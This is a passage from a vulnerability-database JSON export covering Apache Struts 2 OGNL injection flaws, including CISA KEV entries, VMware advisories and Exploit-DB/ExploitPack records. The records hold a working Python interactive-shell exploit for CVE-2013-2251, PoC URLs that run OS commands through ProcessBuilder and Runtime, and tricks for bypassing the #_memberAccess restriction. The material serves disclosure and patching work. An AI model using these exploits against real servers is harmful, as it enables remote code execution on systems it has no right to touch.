"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Apache Struts Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2013-2251", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "The ExceptionDelegator component in Apache Struts 2 before 2.2.3.1 contains an improper input validation vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "cisa_kev", "title": "Apache Struts 2 Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2022-01-21T00:00:00", "id": "CISA-KEV-CVE-2012-0391", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-15T04:10:58", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "exploitdb", "title": "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2020-10-20T00:00:00", "id": "EDB-ID:48917", "href": "https://www.exploit-db.com/exploits/48917", "sourceData": "# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\r\n# Google Dork: ext:action | filetype:action\r\n# Date: 2020/09/09\r\n# Exploit Author: Jonatas Fil\r\n# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n# Version: <= 2.3.15\r\n# Tested on: Linux\r\n# CVE : CVE-2013-2251\r\n\r\n#!/usr/bin/python\r\n#\r\n# coding=utf-8\r\n#\r\n# Struts 2 DefaultActionMapper Exploit [S2-016]\r\n# Interactive Shell for CVE-2013-2251\r\n#\r\n# The Struts 2 DefaultActionMapper supports a method for short-circuit\r\nnavigation state changes by prefixing parameters with\r\n# \"action:\" or \"redirect:\", followed by a desired navigational target\r\nexpression. This mechanism was intended to help with\r\n# attaching navigational information to buttons within forms.\r\n#\r\n# https://struts.apache.org/docs/s2-016.html\r\n# Jonatas Fil (@exploitation)\r\n\r\nimport requests\r\nimport sys\r\nimport readline\r\n\r\n\r\n# Disable SSL\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n# ShellEvil\r\nif len(sys.argv) == 2:\r\n target = sys.argv[1] # Payload\r\n first = target +\r\n\"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','\"\r\n second =\r\n\"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}\"\r\n loop = 1\r\n while loop == 1:\r\n cmd = raw_input(\"$ \")\r\n while cmd.strip() == '':\r\n cmd = raw_input(\"$ \")\r\n if cmd.strip() == '\\q':\r\n print(\"Exiting...\")\r\n sys.exit()\r\n try:\r\n headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36\"}\r\n pwn=requests.get(first+cmd+second,headers =\r\nheaders,verify=False) # Disable SSL\r\n if pwn.status_code == 200:\r\n print pwn.content # 1337\r\n else:\r\n print(\"Not Vuln !\")\r\n sys.exit()\r\n except Exception,e:\r\n print e\r\n print(\"Exiting...\")\r\n sys.exit()\r\n\r\nelse: # BANNER\r\n print('''\r\n __ _ _ _ __ _ _\r\n/ _\\ |__ ___| | | /__\\_ _(_) |\r\n\\ \\| '_ \\ / _ \\ | |/_\\ \\ \\ / / | |\r\n_\\ \\ | | | __/ | //__ \\ V /| | |\r\n\\__/_| |_|\\___|_|_\\__/ \\_/ |_|_|\r\n\r\n by Jonatas Fil [@explotation]\r\n''')\r\n print(\"======================================================\")\r\n print(\"# Struts 2 DefaultActionMapper Exploit [S2-016] #\")\r\n print(\"# USO: python struts.py http://site.com:8080/xxx.action #\")\r\n print(\"======================================================\")\r\n print(\"bye\")\r\n sys.exit()", "sourceHref": "https://www.exploit-db.com/download/48917", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-15T13:37:15", "description": "", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "exploitdb", "title": "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2013-2251", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EDB-ID:44583", "href": "https://www.exploit-db.com/exploits/44583", "sourceData": "CVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action=\"foo\">\r\n ...\r\n <s:submit value=\"Register\"/>\r\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "sourceHref": "https://www.exploit-db.com/download/44583", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-06-08T18:38:31", "description": "a. Vulnerability in third party Apache Struts component \nVMware vCenter Orchestrator is an application to automate management tasks. Alive Enterprise is an application to monitor processes. Both products embed Apache Struts which is a third party component. \nThe following vulnerability has been reported in Apache Struts 2.0.11 or earlier. A remote execution of code vulnerability could allow malicious users to bypass the '#'-usage protection built into the ParametersInterceptor, which could allow server side context objects to be manipulated. \nThe Common Vulnerabilities and Exposures project ( [cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the name CVE-2010-1870 to this vulnerability. \nVMware would like to thank the Vulnerability Research Team of Digital Defense, Inc. for reporting this issue to us. \nApache Struts version 2.0.11 and earlier also contain vulnerabilities which have not been assigned CVE names. This advisory also addresses these vulnerabilities described at the following URLs: \n\n\n * <http://struts.apache.org/2.2.1/docs/s2-002.html>\n * <http://struts.apache.org/2.2.1/docs/s2-003.html>\n * <http://struts.apache.org/2.2.1/docs/s2-004.html>\nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "cvss3": {}, "published": "2011-03-14T00:00:00", "type": "vmware", "title": "VMware vCenter Orchestrator and Alive Enterprise remote code execution vulnerability", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-10-27T00:00:00", "id": "VMSA-2011-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0005.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-19T20:02:48", "description": "a. Vulnerability in third party Apache Struts componentVMware vCenter Orchestrator is an application to automate management tasks. Alive Enterprise is an application to monitor processes. Both products embed Apache Struts which is a third party component.The following vulnerability has been reported in Apache Struts 2.0.11 or earlier. A remote execution of code vulnerability could allow malicious users to bypass the '#'-usage protection built into the ParametersInterceptor, which could allow server side context objects to be manipulated.The Common Vulnerabilities and Exposures project ( cve.mitre.org) has assigned the name CVE-2010-1870 to this vulnerability.VMware would like to thank the Vulnerability Research Team of Digital Defense, Inc. for reporting this issue to us.Apache Struts version 2.0.11 and earlier also contain vulnerabilities which have not been assigned CVE names. This advisory also addresses these vulnerabilities described at the following URLs:", "cvss3": {}, "published": "2011-03-14T00:00:00", "type": "vmware", "title": "VMware vCenter Orchestrator and Alive Enterprise remote code execution vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2011-10-27T00:00:00", "id": "VMSA-2011-0005.3", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0005.3.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-19T20:02:41", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2012-08-30T00:00:00", "type": "vmware", "title": "VMware vSphere and vCOps updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2012-12-20T00:00:00", "id": "VMSA-2012-0013.2", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.2.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nStruts2XWork 2.2.0 - Remote Command Execution", "edition": 2, "cvss3": {}, "published": "2010-07-14T00:00:00", "title": "Struts2XWork 2.2.0 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-14T00:00:00", "id": "EXPLOITPACK:79276FB192FE217AB9D7D1BAF44AF225", "href": "", "sourceData": "Friday, July 9, 2010\nCVE-2010-1870: Struts2/XWork remote command execution\nUpdate Tue Jul 13 2010: Added proof of concept\n\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\n\nIntroduction\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:\n\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\n\ninto\n\naction.getUser().getAddress().setCity(\"Bishkek\")\naction.getUser().setFavoriteDrink(\"kumys\")\n\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\n\nIn addition to property getting/setting, OGNL supports many more features:\n\n * Method calling: foo()\n * Static method calling: @java.lang.System@exit(1)\n * Constructor calling: new MyClass()\n * Ability to work with context variables: #foo = new MyClass()\n * And more...\n\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\n\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\n\nOGNL Context variables\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\n\n * #application\n * #session\n * #request\n * #parameters\n * #attr\n\nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. \n\nCVE-2010-1870\nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:\n\n * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\n * #root\n * #this\n * #_typeResolver\n * #_classResolver\n * #_traceEvaluations\n * #_lastEvaluation\n * #_keepLastEvaluation\n\nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:\n\n#_memberAccess['allowStaticMethodAccess'] = true\n#foo = new java .lang.Boolean(\"false\")\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\n#rt = @java.lang.Runtime@getRuntime()\n#rt.exec('mkdir /tmp/PWNED')\n\nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\n\n\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den\nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti\nme()))=1\n\n\nFixing CVE-2010-1870\nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.\n\n\nIn cases where upgrade isn't possible you can use ParameterInterceptor's \"excludeParams\" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'\"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug.\n\nTimeline\nMay 31st - email to security@struts.apache.org with vulnerability report.\nJune 4th - no response received, contacted developers again.\nJune 5th - had to find an XWork developer on IRC to look at this.\nJune 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.\nJune 20th - 1-line fix commited\nJune 29th - Struts 2.2.0 release voting process started and is still going...", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "edition": 2, "cvss3": {}, "published": "2014-01-14T00:00:00", "title": "Apache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35", "href": "", "sourceData": "CVE Number: CVE-2013-2251\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\nAffected Software: Apache Struts v2.0.0 - 2.3.15\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\nIssue ID by Vender: S2-016\n\nOverview:\n Struts2 is an open-source web application framework for Java.\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\n leads to arbitrary Java method execution on the target server. This is\n caused by insecure handling of prefixed special parameters (action:,\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\n\nDetails:\n <About DefaultActionMapper>\n\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\n request and action to be executed on the server. DefaultActionMapper is\n a default implementation of ActionMapper. It handles four types of\n prefixed parameters: action:, redirect:, redirectAction: and method:.\n\n For example, redirect prefix is used for HTTP redirect.\n\n Normal redirect prefix usage in JSP:\n <s:form action=\"foo\">\n ...\n <s:submit value=\"Register\"/>\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\n </s:form>\n\n If the cancel button is clicked, redirection is performed.\n\n Request URI for redirection:\n /foo.action?redirect:http://www.google.com/\n\n Resopnse Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/\n\n Usage of other prefixed parameters is similar to redirect.\n See Struts2 document for details.\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\n\n <How the Attack Works>\n\n As stated already, there are four types of prefixed parameters.\n\n action:, redirect:, redirectAction:, method:\n\n All except for method: can be used for attacks. But regarding action:,\n it can be used only if wildcard mapping is enabled in configuration.\n On the one hand, redirect: and redirectAction: are not constrained by\n configuration (thus they are convenient for attackers).\n\n One thing that should be noted is that prefixed parameters are quite\n forceful. It means that behavior of application which is not intended\n to accept prefixed parameters can also be overwritten by prefixed\n parameters added to HTTP request. Therefore all Struts2 applications\n that use DefaultActionMapper are vulnerable to the attack.\n\n The injection point is name of prefixed parameters.\n Example of attack using redirect: is shown below.\n\n Attack URI:\n /bar.action?redirect:http://www.google.com/%25{1000-1}\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/999\n\n As you can see, expression (1000-1) is evaluated and the result (999)\n is appeared in Location response header. As I shall explain later,\n more complex attacks such as OS command execution is possible too.\n\n In DefaultActionMapper, name of prefixed parameter is once stored as\n ActionMapping object and is later executed as OGNL expression.\n Rough method call flow in execution phase is as the following.\n\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\n\nProof of Concept:\n <PoC URLs>\n\n PoC is already disclosed on vender's web page.\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n\n Below PoC URLs are just quotes from the vender's page.\n\n Simple Expression:\n http://host/struts2-blank/example/X.action?action:%25{3*4}\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\n\n OS Command Execution:\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n\n Obviously such attacks are not specific to blank/showcase application,\n but all Struts2 based applications may be subject to attacks.\n\n <OS Command Execution and Static Method Call>\n\n Another topic that I think worth mentioning is that PoC URLs use\n ProcessBuilder class to execute OS commands. The merit of using this\n class is that it does not require static method to execute OS commands,\n while Runtime class does require it.\n\n As you may know, static method call in OGNL is basically prohibited.\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\n a simple trick:\n\n %{#_memberAccess['allowStaticMethodAccess']=true,\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\n prevent the trick. However there are still some techniques to call\n static method in OGNL.\n\n One 